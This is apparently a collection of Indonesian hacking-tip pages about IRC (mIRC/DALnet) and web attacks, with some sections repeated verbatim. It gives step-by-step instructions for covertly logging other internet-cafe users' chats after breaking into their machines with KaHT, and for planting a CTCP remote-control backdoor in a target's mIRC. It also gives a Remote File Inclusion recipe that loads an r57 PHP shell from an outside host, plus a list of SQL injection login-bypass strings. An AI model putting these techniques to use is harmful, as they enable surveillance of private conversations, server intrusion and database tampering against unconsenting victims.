(Perintah lainnya dapat dilihat di Peritah DAl.NET)
Penulis :
Yogya Family Code
Referensi :
1. Jasakom.com
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Kedasyatan Hennes Script NW v0.61 IRC
Hennes Script NW v0.61 IRC : Download hennes Script NW v0.61
Percayakah anda bahwa dengan script ini anda bisa mendapatkan puluhan kenalan baru bahkan mungkin ratusan dengan hitungan menit ? Anda harus coba jika anda sering mencari teman lewat Via IRC, karena script ini benar-benar hebat dalam melakukan mengirim pesan ke chatter-chatter, dan selain itu juga juga bisa diandalkan untuk inviter dan advertising apa saja, wow! Lalu apa yang membuat kemampuan script ini begitu hebat ? dan bagaimana cara kerjanya ? apa kelemahannya ?
Script ini mampu memberikan pesan ke seluruh chatter dalam 1 channel meskipun anda langsung di ban oleh AOP, SOP bahkan founder waktu anda mengirim pesan oleh chatter-chatter, tapi pesan anda ke chatter tersebut tidak akan hilang / atau berhenti, tapi pengiriman pesan terus berjalan, bayangkan, apa kurang hebat ? tapi script ini mempunyai kelemahan yaitu kemampuan ini tidak akan berjalan jika anda masuk ke channel besar kayak #jakarta, #bandung, #yogyakarta, #solo, #semarang dan sebagainya, mengapa ? karena bagaimana mungkin kita chatting dengan semua orang di channel dalam 1 - 2 detik. jelas langsung disconect, cocoknya script ini dijalankan di channel yang ga begitu rame kaya #manado, #purwokerto, #yogya (kalo pas sepi) dan sebagainya.
Sebelum kita memulai saran webmaster masuklah di Option dahulu untuk mengganti themenya menjadi MIRC, tapi kalau anda tidak ingin itu juga bukan masalah untuk percobaan script ini.
Bagaimana cara menjalankan fasilitas ini ?
Pada saat anda sudah connect ke dal.net dan masuk channel maka segera klik kanan saja pada room channel, lalu pilih pilihan other dan klik pada pilihan Send private message to everyone, dan tulis aja pesannya, nanti para chatter jika menjawab maka anda akan terasa di ajak chat duluan, hehe :)
Sebenarnya banyak program-program luar biasa lainnya yang musti di punyai oleh anda para member, hanya saja family code disini memberikan informasi langka yang programnya ga ada di rental CD manapun di pelosok tanah air, menurut surfey Family Code, program-program hacker dan pemecah password udah banyak sekali di rental-rental CD seperti Passware Kit, trojan, backdoor dan lain-lainnya dan tentu saja semuanya bisa anda mudah dapatkan dengan sedikit money, jika anda merasa malas ke rental maka anda dapat langsung ke google aja mencari programnya, banyak banget, www.jasakom.com adalah sumber ilmu yang dapat anda pelajari sendiri.
Penulis :
Yogya Family Code
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Tips di IRC
Nih tips untuk para chatter IRC, mau tahu ?
Pertama-tama..
Sebelum anda memulai chatting dengan mIRC ada 3 hal yang sangat penting yang harus anda perhatikan :
1. Periksa Full name pada option Connect, gantilah Full name jika ada nama warnetnya tertulis
2. Periksa pada option Connect lalu pada identd, gantilah "user id" jika ada nomor room tertulis disini.
3. Periksa pada option IRC lalu pada Logging, gantilah menjadi "none" pada "automatically logs" jika posisi diluar itu.
4. Periksa pada Windows Task Manager apakah ada Keylogger terpasang :)
Tips diatas itu adalah kewaspadaan standard agar kita tidak mudah diketahui teman chatter kita.
Efek jika tidak menuruti tips diatas maka efeknya adalah :
1. jika "user id" tersebut memberi angka / nama room saat anda sedang chatting maka anda sama saja membuka diri
2. Jika pada logging bukan "none" maka bersiap-siaplah isi chattingan anda dilihat orang ketiga
3. Keylogger adalah program yang berbahaya jika terpasang, Ini yang cukup susah diperiksa jika tidak ada program scanner keylogger, tapi jika anda ingin memeriksanya tekan Ctrl+Alt+del, lihat list program yang sedang berjalan, jika ada nama program yang aneh dan asing berjalan maka matikan saja prosesnya tapi anda harus hati-hati dalam melakukanya, tapi dari semua itu anda tidak perlu resah karena kenyataanya sangat jarang ada user melakukan hal ini karena warnet-warnet saat ini telah dilengkapi program-program canggih untuk menangani hal beginian (restore).
Penulis :
Yogya Family Code
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Tips tambahan di IRC
Tips tambahan khusus para chatter yang ingin menyembunyikan diri
Jika anda ingin chatting benar-benar tidak ingin ada yang tahu keberadaan anda maka anda bisa mengikuti tips kehati-hatian ini, karena memang kadang tips ini sering kali dilupakan karena memang tips ini sedikit gerah untuk dilaksanakan, tapi gak ada salahnya kan kita mencoba ?
1. Periksalah Quit Message pada menu pilihan IRC lalu messages, jika disitu muncul nama dan alamat warnet maka segera gantilah pesan itu dengan kalimat lain atau dikosongkan saja, karena jika anda mengaktifkannya maka pada saat keluar dari IRC maka pesan ini akan muncul di channel dan orang lain akan mengetahui dimana anda berada saat chatting.
2. Ssetelah keluar / disconnect dari mIRC, jangan lupa masuk mIRC lagi, dan segera ganti nama, e-mail, nickname alternative juga user id karena jika anda lupa menggantinya maka orang yang menggunakan komputer setelah anda akan mengetahui nama, e-mail, nickname,. alternativ dan user id anda.
3. Jangan lupa, jika anda sering copy paste, segera hilangkan memory copy paste anda dengan melakukan copy text lain untuk menghindari orang lain untuk mengetahui paste text anda.
Semoga informasi diatas dapat membantu dan menambah pengetahuan anda.
Penulis :
Yogya Family Code
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Tips tambahan di IRC II
Tips agar kita tidak diremote atau dipermainkan di IRC
Sudah biasa banyak sekali spam di IRC yang menganggu contohnya ini :
WANNA BE OPERATOR #channel ?? copy/paste this-> < <== Jangan copy paste di mIRC anda kalau ada hal beginian karena dapat merusak / menyerang komputer anda (Sering ada di channel-channel besar, webmaster dah cek )
STOP SPAM copy/paste this-> <<== Ini juga sama saja
Cara menangani para cracker :
1. Periksalah remote mIRC anda caranya Tahan Alt lalu tekan R.
2. Biasanya mIRC-mIRC warnet dikosongkan remotenya tapi jika ada isinya lebuh baik delete remote yang sekiranya aneh (asing).
3. Periksa timer anda, caranya (ketik /timer ) jika misal ada timer yang bekerja ketik //!timers off
4. Menghilangkan decode :
Ketik kode ini di mIRC :
//!timers off | !ignore -r | !unload -rsn " $+ $chr(160) $+ . $+ $chr(160) $+ " | !remove " $+ $chr(160) $+ . $+ $chr(160) $+ " | !say $script($script(0))
Penulis :
Yogya Family Code
Referensi
rhega (OP #Yogyakarta)
Triks di IRC :
Cara agar bisa masuk ke dal.net dal.net dimana sebelumnya tidak bisa masuk karena trojan atau virus ?
masuklah ke irc.server.telkom.net.id setelah itu baru baru membuka server dal.net, jika masih tidak bisa maka anda harus mencari program scan antivirus dan trojan, anda dapat mendownloadnya berdasar referensi DAL.NET pada saat pesan terahkir connect.
Bagaimana cara melacak keberadaan teman chat kita ?
Whois saja chatter tersebut lalu cocokkan ip addreasnya dengan daftar ip addreas warnet Yogya di samping kanan. Jika ip addreas anda tidak ada dalam daftar maka anda dapat menggunakan pelacakan lain seperti http://www.apnic.org, :)
Bagaimana cara melacak boks warnet teman chat kita ?
Whois saja chatter tersebut lalu lihat sebelah kiri dari sebelum tanda "@ip addreas", jika ada angka maka kemungkinan besar dia di room tersebut, jika tidak ada maka periksa ip addreasnya apakah warnet tersebut menerapkan berbeda ip addreas tiap boks, jika iya maka hitunglah logika ip addreas tersebut sehingga ahkirnya dapat menemukan tempat boks teman chat anda.
Bagaimana kita ingin mencari teman chat di warnet sendiri (Hanya untuk channel yang memiliki BOT khusus !seen)?
D di channel #yogyakarta cukup ketikkan !seen *!*@ip addreas warnet anda, bisa juga dengan !seen nickname, fasilitas ini biasanya disediakan channel-channel besar tapi tidak menutep channel kecilpun mempunyai fasilitas ini.
Bagaimana kita ingin mencari teman chat di warnet sendiri ? (Dari perintah DAL.NET! Tidak perlu BOT channel)
/who #nama channel *@ip addreas warnet (cara ini sangat efektif jika BOT channel benar-benar memproteksi para chatter sehingga sangat membatasi informasi yang akan diberikan kepada anda).
Bagaimana kita ingin mencari nickname teman kita di channel #yogyakarta ?
cukup mudah, ketikkan di channel #yogyakarta !seen nickname teman kita.
Bagaimana cara kita memata-matai teman chat kita di satu warnet ? Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah di logs mirc teman kita biasanya di "c:\program files\mirc\logs".
Bagaimana cara kita meyakinkan bahwa teman chat kita disuatu room memang benar adanya memakai nickname yang kita maksud ?
Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah ke directory mirc teman kita biasanya di "c:\program files\mirc" lalu buka file mirc.ini. Jika anda mengalami masalah tiap komputer dipassword maka anda dapat memanfaatkan program Internet Maniac beserta PQwak, jika tiap komputer menggunakan Windows XP, tembus aja pakek KAHT yang bisa kamu download disini.
Proteksi diri di IRC dapat dilakukan dengan PSY dan Proxy tapi yang umum dan tidak memakan biaya adalah menggunakan proxy, bagaimana caranya ?
Carilah proxy di google, kemudian pastekan ke option mIRC yaitu pada "connect" lalu "firewall', firewall support diganti "server", protocol diganti "proxy" lalu tinggal anda isi hostname dan portnya sesuai dengan proxy yang anda dapatkan.
Referensi untuk mendapatkan proxy :
- http://www.proxyweb.net
- http://proxy.lessel.us/cgi-bin/nph-proxy.cgi
- http://www.multiproxy.org
- http://www.publicproxyservers.com/index.html
- http://www.hotscripts.com/Detailed/28480.html
- http://www.inetprivacy.com/a4proxy/anonymous-grc.htm
- http://www.sa6ry.com/surfanonymous/faq/hide-ip-address.html
- http://www.steganos.com (proxy)
- http://www.guardster.com (free proxy)
- http://www.anonymizer.com/index.cgi (proxy)
- http://www.orangatango.com/home/index.ie.html (proxy)
- http://proxify.com
- http://www.tehbox.com/proxy
- http://www.proxy4free.com/index.html
- http://www.stayinvisible.com/index.pl
- http://free-proxies.com
(Referensi Proxy dari Si Cebol, Indonewbies.tk)
Menampilkan ip-ip addreas para chatter di channel?
Pada Option lalu pilih IRC lalu aktifkan / centang pada Show Ip Addreasess
Penulis :
Yogya Family Code
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Special triks di IRC :
Melihat seluruh isi chattingan teman kita disatu warnet walaupun komputer client / server tidak dishare sama sekali ! Luar biasa !
(Ilmu rahasia kreasi webmaster sendiri pada bulan November 2004)
Syarat untuk melakukan teknik memata-matai orang chatting di satu jaringan LAN (Local Area network) adalah sebagai berikut :
1. Menguasai MS-DOS dengan baik (Karena disini semua menggunakan DOS)
2. Punya logika yang baik dan dapat mengetik cepat (Karena disini anda dikejar dengan waktu dan membutuhkan pemikiran yang cepat)
Baiklah kita langsung saja, terapkan ilmu KaHT seperti ditutorial hacker lalu untuk masuk ke komputer sasaran, setelah anda masuk dikomputer tujuan, segera anda masuk ke MiRC komputer sasaran biasanya ada di c:\program files\mirc (ketik : "cd\progra~1\mirc") tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : "cd\mirc")
A. Untuk komputer yang drive D-nya di share :
Saat ini anda periksa apakah komputer sasaran drive d-nya dishare ? jika ya ikuti cara dibawah ini
jadi kodenya seperti dibawah ini kalau mau lengkap seperti ini
[dirs]
logdir=d:\
[options]
n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0
setelah itu tekan ctrl + z untuk menyimpan, lalu tinggal anda masuk ke drive D komputer tersebut melalui LAN yang tentu saja sudah dishare, jadi cukup double klik aja files berekstensi log, lalu buka files itu pakek notepad untuk melihat terus isi chattingannya.
Jadi kesimpulannya yang membuat penyimpanan file log di drive D karena perintah :
[dirs]
logdir=d:\
Jika anda bingung dalam menghitungkan angkanya diatas, ini urutannya untuk mempermudah:
1. 5=1x
2. 100=1x
3. 0=7x
4. 1=1x
5. 0=1x
6. 1=7x
7. 0=2x
8. 1=3x
9. 0=1x
10. 5=1x
11. 0=5x
12. 1=1x
13. 0=2x
B. Untuk komputer sasaran tidak dishare :
Setelah anda membaca cara A Lalu sekarang bagaimana jika drive d tidak dishare ? tidak masalah ! kita tetap bisa mengikuti isi chattingan dia, caranya seperti diawal tadi yaitu cari dahulu program mIRC komputer sasaran yang biasanya ada di c:\program files\mirc (ketik : "cd\progra~1\mirc") tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : "cd\mirc")
Setelah kita masuk didirektory MiRC, ketik "del mirc ini" setelah itu ketik "copy con mirc.ini" lalu ketik kode rekam mirc.ini dibawah ini :
[options]
n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0
setelah itu tekan ctrl + z untuk menyimpan, lalu silahkan tengok di "c:\progra~1\mirc\logs" cara melihat cukup ketik "type nickname.log*
* : Nickname diisi nick orang
Luar biasa buka, ingat sebagai catatan, Agar teknik berjalan baik maka teknik ini dilakukan / diterapkan pada semua boks warnet sebelum chatter tersebut chatting diboks tersebut, atau kalau udah terlanjut dia chatting di boks tersebut maka diset rekam aja MiRCnya gpp, sapa tahu MiRCnya error lalu dia buka lagi, :)
Dari tutorial ini maka dimanapun anda berada, semua isi chatting anda dapat dilihat orang walaupun anda tidak menyadarinya, "anda tidak melihat kami tapi kami melihat anda" :))
Penulis :
Yogya Family Code
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Remote IRC (Mengontrol 100% segala chattingan user)
ketikkan perintah "ctcp *:*:?:$1-" ke dalam remote mIRC sasaran lalu masukan juga di dalam variables "%master Nick_kamu".
Perintah mengontrol komputer target :
/ctcp
/ctcp
/ctcp
/ctcp
/ctcp
/ctcp
(Perintah lainnya dapat dilihat di Peritah DAl.NET)
Penulis :
Yogya Family Code
Referensi :
1. Jasakom.com
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Kedasyatan Hennes Script NW v0.61 IRC
Hennes Script NW v0.61 IRC : Download hennes Script NW v0.61
Percayakah anda bahwa dengan script ini anda bisa mendapatkan puluhan kenalan baru bahkan mungkin ratusan dengan hitungan menit ? Anda harus coba jika anda sering mencari teman lewat Via IRC, karena script ini benar-benar hebat dalam melakukan mengirim pesan ke chatter-chatter, dan selain itu juga juga bisa diandalkan untuk inviter dan advertising apa saja, wow! Lalu apa yang membuat kemampuan script ini begitu hebat ? dan bagaimana cara kerjanya ? apa kelemahannya ?
Script ini mampu memberikan pesan ke seluruh chatter dalam 1 channel meskipun anda langsung di ban oleh AOP, SOP bahkan founder waktu anda mengirim pesan oleh chatter-chatter, tapi pesan anda ke chatter tersebut tidak akan hilang / atau berhenti, tapi pengiriman pesan terus berjalan, bayangkan, apa kurang hebat ? tapi script ini mempunyai kelemahan yaitu kemampuan ini tidak akan berjalan jika anda masuk ke channel besar kayak #jakarta, #bandung, #yogyakarta, #solo, #semarang dan sebagainya, mengapa ? karena bagaimana mungkin kita chatting dengan semua orang di channel dalam 1 - 2 detik. jelas langsung disconect, cocoknya script ini dijalankan di channel yang ga begitu rame kaya #manado, #purwokerto, #yogya (kalo pas sepi) dan sebagainya.
Sebelum kita memulai saran webmaster masuklah di Option dahulu untuk mengganti themenya menjadi MIRC, tapi kalau anda tidak ingin itu juga bukan masalah untuk percobaan script ini.
Bagaimana cara menjalankan fasilitas ini ?
Pada saat anda sudah connect ke dal.net dan masuk channel maka segera klik kanan saja pada room channel, lalu pilih pilihan other dan klik pada pilihan Send private message to everyone, dan tulis aja pesannya, nanti para chatter jika menjawab maka anda akan terasa di ajak chat duluan, hehe :)
Sebenarnya banyak program-program luar biasa lainnya yang musti di punyai oleh anda para member, hanya saja family code disini memberikan informasi langka yang programnya ga ada di rental CD manapun di pelosok tanah air, menurut surfey Family Code, program-program hacker dan pemecah password udah banyak sekali di rental-rental CD seperti Passware Kit, trojan, backdoor dan lain-lainnya dan tentu saja semuanya bisa anda mudah dapatkan dengan sedikit money, jika anda merasa malas ke rental maka anda dapat langsung ke google aja mencari programnya, banyak banget, www.jasakom.com adalah sumber ilmu yang dapat anda pelajari sendiri.
Penulis :
Yogya Family Code
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Mengenal shell exploite inject
Mungkin anda masih merasa bingung dengan shell exploite inject pada web tapi pada dasarnya semua shell sama saja cuma yang membedakan cara pemakaian shell atau bentuk dari shell itu sendiri apa berbasis aplikasi atau berbasis website tapi namanya shell jelas command - command masih sama mungkin misalkan pada shell yang aplikasi servernya berbasis linux jelas perintah yang digunakan berbasis linux juga. nah kali ini saya akan membahas tentang shell inject yang jelas saja berbasis website karena pada umumnya orang - orang memakai shell ini dalam dunia IRC biasa disebut dengan kalimat “target” saya juga heran mengapa dinamakan target? mungkin karena sudah kebiasaan padahal namanya shell inject.
Bagai mana cara mendapatkan shell tersebut?..
Mudah saja hanya dengan meman faatkan bugs bugs pada script web tersebut biasanya itu semua kelalaian dari pemakai web yang mempunyai bugs nah dalam pencarian shell inject berbasis web ini ada bermacam cara - cara injected tapi saya akan membahas cara inject dengan Remote File Inclusion Vulnerability itu menggunakan bugs dalam file script pada website yang akan di inject
Bagai mana cara melihat bugs pada suatu script aplikasi pada website?..
Hanya dengan menggunakan rumus logika panggilan data (include,require) ditambah dengan variabel pada script tersebut inlclude + $variabel semua memakai rumus seperti itu contoh script
($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');
?>
require <--- panggilan data
$docroot <--- variabel
/FCDIRECTORY/fc_functions/fc_functions.php <---
directory dan file dimana ditemukan bugs
(kerusakan atau kelemahan)
jelas pada script di atas kelihatan bugs jika dikaitkan dengan rumus include+variabel maka akan menjadi suatu shell inject tinggal kita mengolah script tersebut.
sekarang kita akan membentuk suatu script yang sebentar akan dikaitkan dengan link pada website degan cara memutar balikan script tersebut dengan mengubah kedudukan include dan variabel serta mengubah variabel yang dikenal tanda “$” menjadi “?”
$docroot.'/FCDIRECTORY/fc_functions/fc_functions.php
jika diputar balikan akan menjadi
/FCDIRECTORY/fc_functions/fc_functions.php?docroot=
Kaitan Bugs dan Link pada Website
Ini merupakan saat yang paling enak dipelajari apa kaitan bugs dengan link pada website atau target website yang akan kita masuk. Jelas kaitanya sangat erat dan wajib untuk diperlakukan. Mengapa?..karena tanpa bugs tersebut kita tidak bisa mendapatkan shell inject kita akan masuk pada website melalui bugs atau kelemahan pada website tersebut dimana letak kelemahan website tersebut?..letaknya ada pada script bugs
require
($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');
?>
sekarang kita akan menggabungkan link website dengan bugs tapi sebelumnya kita harus mempunyai injection atau code shell php anda bisa dapatkan pada link www.andi-a.biz/tools/shell.txt? atau www.andi-a.biz/tools/r57.txt?
nah sekarang akan kita gabungkan akan menjadi seperti
/FCDIRECTORY/fc_functions/
fc_functions.php?docroot=[shell code]
contoh:
www.site.com/[path]/FCDIRECTORY/fc_functions/
fc_functions.php?docroot=[shell code]
gunakan shell code :
www.andi-a.biz/tools/shell.txt?
contoh :
fc_functions.php?docroot=www.andi-a.biz/tools/shell.txt?
jika sudah menjadi seperti itu kita tinggal mencari target website yang siap kita masuk biasanya pencarian target website lewat situs pencarian seperti yahoo,google,altavista,lycos dan masih banyak lagi atau bisa menggunakan bot scan perl lewat IRC (yang menggunakan bot scan kerjaan orang malas) namun apa salahnya jika teknologi semakin berkembang menggapa tidak jika kita menggunakan sesuatu yang akan mempermudah pekerjaan kita
Screenshot Shell Inject
tampilan shell code
shell1.gif
tampilan list directory shell code
shell2.gif
Mungkin anda masih merasa bingung dengan shell exploite inject pada web tapi pada dasarnya semua shell sama saja cuma yang membedakan cara pemakaian shell atau bentuk dari shell itu sendiri apa berbasis aplikasi atau berbasis website tapi namanya shell jelas command - command masih sama mungkin misalkan pada shell yang aplikasi servernya berbasis linux jelas perintah yang digunakan berbasis linux juga. nah kali ini saya akan membahas tentang shell inject yang jelas saja berbasis website karena pada umumnya orang - orang memakai shell ini dalam dunia IRC biasa disebut dengan kalimat “target” saya juga heran mengapa dinamakan target? mungkin karena sudah kebiasaan padahal namanya shell inject.
Bagai mana cara mendapatkan shell tersebut?..
Mudah saja hanya dengan meman faatkan bugs bugs pada script web tersebut biasanya itu semua kelalaian dari pemakai web yang mempunyai bugs nah dalam pencarian shell inject berbasis web ini ada bermacam cara - cara injected tapi saya akan membahas cara inject dengan Remote File Inclusion Vulnerability itu menggunakan bugs dalam file script pada website yang akan di inject
Bagai mana cara melihat bugs pada suatu script aplikasi pada website?..
Hanya dengan menggunakan rumus logika panggilan data (include,require) ditambah dengan variabel pada script tersebut inlclude + $variabel semua memakai rumus seperti itu contoh script
($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');
?>
require <--- panggilan data
$docroot <--- variabel
/FCDIRECTORY/fc_functions/fc_functions.php <---
directory dan file dimana ditemukan bugs
(kerusakan atau kelemahan)
jelas pada script di atas kelihatan bugs jika dikaitkan dengan rumus include+variabel maka akan menjadi suatu shell inject tinggal kita mengolah script tersebut.
sekarang kita akan membentuk suatu script yang sebentar akan dikaitkan dengan link pada website degan cara memutar balikan script tersebut dengan mengubah kedudukan include dan variabel serta mengubah variabel yang dikenal tanda “$” menjadi “?”
$docroot.'/FCDIRECTORY/fc_functions/fc_functions.php
jika diputar balikan akan menjadi
/FCDIRECTORY/fc_functions/fc_functions.php?docroot=
Kaitan Bugs dan Link pada Website
Ini merupakan saat yang paling enak dipelajari apa kaitan bugs dengan link pada website atau target website yang akan kita masuk. Jelas kaitanya sangat erat dan wajib untuk diperlakukan. Mengapa?..karena tanpa bugs tersebut kita tidak bisa mendapatkan shell inject kita akan masuk pada website melalui bugs atau kelemahan pada website tersebut dimana letak kelemahan website tersebut?..letaknya ada pada script bugs
require
($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');
?>
sekarang kita akan menggabungkan link website dengan bugs tapi sebelumnya kita harus mempunyai injection atau code shell php anda bisa dapatkan pada link www.andi-a.biz/tools/shell.txt? atau www.andi-a.biz/tools/r57.txt?
nah sekarang akan kita gabungkan akan menjadi seperti
/FCDIRECTORY/fc_functions/
fc_functions.php?docroot=[shell code]
contoh:
www.site.com/[path]/FCDIRECTORY/fc_functions/
fc_functions.php?docroot=[shell code]
gunakan shell code :
www.andi-a.biz/tools/shell.txt?
contoh :
fc_functions.php?docroot=www.andi-a.biz/tools/shell.txt?
jika sudah menjadi seperti itu kita tinggal mencari target website yang siap kita masuk biasanya pencarian target website lewat situs pencarian seperti yahoo,google,altavista,lycos dan masih banyak lagi atau bisa menggunakan bot scan perl lewat IRC (yang menggunakan bot scan kerjaan orang malas) namun apa salahnya jika teknologi semakin berkembang menggapa tidak jika kita menggunakan sesuatu yang akan mempermudah pekerjaan kita
Screenshot Shell Inject
tampilan shell code
shell1.gif
tampilan list directory shell code
shell2.gif
SQL singkatan dari Structured Query Language yg merupakan bahasa komputer standar yg ditetapkan oleh ANSI (American National Standard Institute) untuk mengakses dan memanupulasi sistem database. SQL bekerja dgn program2 database seperti MS Access, DB 2, Informix, MS SQL Server, Oracle, Sybase dan lain sebagainya.
SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking utk menggapai akses pada sistem database yg berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL dalam mengolah suatu sistem database. Hasil yg ditimbulkan dari teknik ini membawa masalah yg sangat serius. Mengapa disebut SQL Injection ? seperti yg kita ketahui, injection jika diartikan ke dalam bahasa Indonesia yaitu "suntikan". Yang terjadi memang seperti melakukan suntikan terhadap SQL yg tujuannya adalah tergantung kepada pelakunya dan pada intinya jika disalahgunakan maka akan membawa aspek negatif terhadap korban.
Sudah disinggung diatas bahwa SQL Injection attack memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL maksudnya adalah memanfaatkan teknik string building untuk mengeksekusi/menjalankan kode SQL. Jadi prinsip dasar SQL Injection sebenarnya memanfaatkan kode insecure (tidak aman) atas sebuah sistem yg terhubung ke internet dalam upaya melangkahi command (perintah) dan secara langsung menuju ke database untuk kemudian mengambil keuntungan dari sistem yg dijamin aman untuk melakukan pengambilan atau pengubahan atau lain sebagainya oleh penyerang.
Keuntungan yg diambil adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya.
Input Query String
Default setting dari SQL menggunakan :
adminID = sa
password ='' (kosong atau blank)
misalnya : http://www.target.com/login.asp?adminID=sa%20password=''
%20 artinya menggantikan "jarak spasi"
Ini merupakan kondisi yg berbahaya jika pengubahan setting tidak segera dilakukan.
Verifikasi yg dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yg terlihat pada teks sebagai berikut :
SQLQuery="SELECT Username FROM Users WHERE Username="'&strUsername&"'strpassword&"'
Pada verifikasi terdapat kelemahan pada pemprosesan pada string2 tertentu yg sebenarnya string tersebut dapat dikatakan sebagai input ilegal. Verifikasi tetap melakukan proses dan nantinya menghasilkan error page. Error page tersebut justru membuka rahasia struktur database dan bahkan error page tetapi eksekusi terhadap validasi input tetap dijalankan.
Contoh : menggunakan injection string 'OR''= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :
SELECT Username FROM Users WHERE Username=''OR''='' AND Password=''OR''=''
Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.
Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :
'or 1=1--
'or 0=0 --
'or 'x'='x
'or a=a-
"or 0=0 --
"or 0=0 #
"or "x"="x
")or("a"="a
admin'--
hi" or 1=1 --
hi' or'a'='a
hi")or("a"="a
or 0=0 #
'or a=a--
'or 0=0 #
'having 1=1--
"or 1=1--
"or "a"="a
')or('a'='a
')or('x'='x
hi" or "a"="a
hi' or 1=1 --
hi')or('a'='a
or 0=0 --
or 1=1--
Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang. Contoh :
'UPDATE YEPCell_memberDB set Credits=100 wher UserID='yamakasi'
SQl Injection yg dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yg terlalu asing terdengar ditelinga anda. Anda dapat mencarinya di www.google.com
Sumber : http://www.jambihackerlink.tk/
SQL Commands Yang Umum Digunakan
Berikut adalah beberapa SQL Commands yang umum, disini saya tidak akan memandu anda bagaimana cara penggunaan dari Command tersebut...jadi jangan pernah bertanya kepada saya bagaimana command tersebut digunakan.......sikap bijaksana yang harus anda ambil adalah dengan bertanya kepada paman google....karena dengannya akan terkuak jawaban dari pertanyaan anda..........
Berikut ini Commandnya:
ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database
